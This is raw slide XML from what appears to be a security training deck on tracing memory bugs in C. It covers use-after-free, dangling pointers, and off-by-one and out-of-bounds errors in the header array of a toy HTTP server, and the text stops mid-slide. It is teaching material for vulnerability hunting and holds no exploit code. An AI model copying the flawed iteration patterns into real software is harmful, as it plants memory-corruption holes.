                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEE8C272-142B-4349-8151-5DEBE92254C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810486" y="4995920"/>
            <a:ext cx="228389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643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2AA4-E092-7146-BE5D-7A23E9619C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracing a Use After Free – 2 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99200646-0A80-5348-A937-C3B987AFE004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629842" y="1878809"/>
            <a:ext cx="3868340" cy="3196886"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Find all occurrences of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> being set.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Identify calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>on the memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Trace code base for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of these variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If there is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, then we have found a vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B34DFB88-4D72-B4CD-1A94-B93EC70B1F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684609" y="1181502"/>
            <a:ext cx="3887391" cy="617934"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Dangling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Hanging on cliff Images, Stock Photos &amp; Vectors | Shutterstock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE762B8B-9FD8-234C-9E11-B32B9CBA97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70"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4498182" y="1144380"/>
            <a:ext cx="3056380" cy="2018906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Dangling pointer UAF">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A51E2855-BAAE-994A-9251-5C201EE89FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498182" y="3205017"/>
            <a:ext cx="3056380" cy="1851676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C6FF4EC-DC30-0A40-9D47-00459FA3DD60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498182" y="5056693"/>
            <a:ext cx="228389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E7849B-4B5C-5042-8D65-4E7CEBBFB19E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498182" y="3907235"/>
            <a:ext cx="291000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634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ABAE-60F8-7146-A683-D378AD9D235D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracing UAF in Code Base</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EFCA0F3-D8AF-D04D-8AFF-914A5B9AD31A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>line_one_req</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begin_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="First line struct">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31707204-E37D-FB44-A35B-203729B59EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="982850" y="1631153"/>
            <a:ext cx="6248400" cy="3238500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2983197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2C9D-FA9A-E747-A156-A840A8E42FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your Turn to Trace Bugs!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Iterating over an array in C">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87CFC08A-B7D5-154B-9942-B37443EA5565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="334182" y="1369219"/>
            <a:ext cx="3886200" cy="1882166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51B7A2A2-A54B-B949-9F70-BAE60DCF7ADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4636465" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Array iterations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of pointers to response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maximum size: 0x20</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3122139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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Iterating Over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res_header_lst</a:t>
            </a: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dirty="0"/>
              <a:t>Element != NULL: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> have an assigned header yet?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Index &lt; 0x20: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are we passed the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>maximum size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of the array? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Iterating on the 'res_header_lst' ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967AC837-F8F6-0D44-B1D1-36655BCA4173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="31232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191539" y="2868293"/>
            <a:ext cx="6914073" cy="1192263"/>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1305531" y="3752252"/>
            <a:ext cx="654436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41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1DE3-26EC-FB48-9A06-4AECB9BEDD22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Server – From Scratch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197ACAC9-F3F7-42C6-6672-3F5E60027D93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2482124599"/>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103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a:xfrm>
            <a:off x="550190" y="242369"/>
            <a:ext cx="9159499" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Array Iteration – Bug 1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>serve_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a: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dirty="0"/>
              <a:t>Index over iteration: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Will STOP at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>0x20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Check to STOP usage with 0x20 as index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More than 0x20 responses header – off by 1 pointer write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Iterating on the 'res_header_lst' ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967AC837-F8F6-0D44-B1D1-36655BCA4173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="-56"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191539" y="2868293"/>
            <a:ext cx="6914073" cy="1734704"/>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1299819" y="4612408"/>
            <a:ext cx="654436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674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a:xfrm>
            <a:off x="69742" y="43417"/>
            <a:ext cx="9926665" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Array Iteration – Bug 2 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>interpret_single_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"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dirty="0"/>
              <a:t>Index over iteration: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Will STOP at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>0x20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Check to STOP usage with 0x20 as index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More than 0x20 responses header – off by 1 pointer write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Iterating on the 'res_header_lst' ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967AC837-F8F6-0D44-B1D1-36655BCA4173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="-56"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191539" y="2868293"/>
            <a:ext cx="6914073" cy="1734704"/>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1299819" y="4612408"/>
            <a:ext cx="654436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009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a:xfrm>
            <a:off x="-77492" y="2737"/>
            <a:ext cx="9926665" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Array Iteration – Bug 3 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>send_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"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dirty="0"/>
              <a:t>No bounds check – only a pointer check </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Reads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> OOB of array into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Out of bounds pointer usage (read) ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59980646-496D-334B-ABE8-C68AE4A62A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="69741" y="2852859"/>
            <a:ext cx="9096939" cy="1540910"/>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69741" y="3657050"/>
            <a:ext cx="654436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097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a:xfrm>
            <a:off x="278969" y="0"/>
            <a:ext cx="9926665" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Array Iteration – Bug 4 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cleanup_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
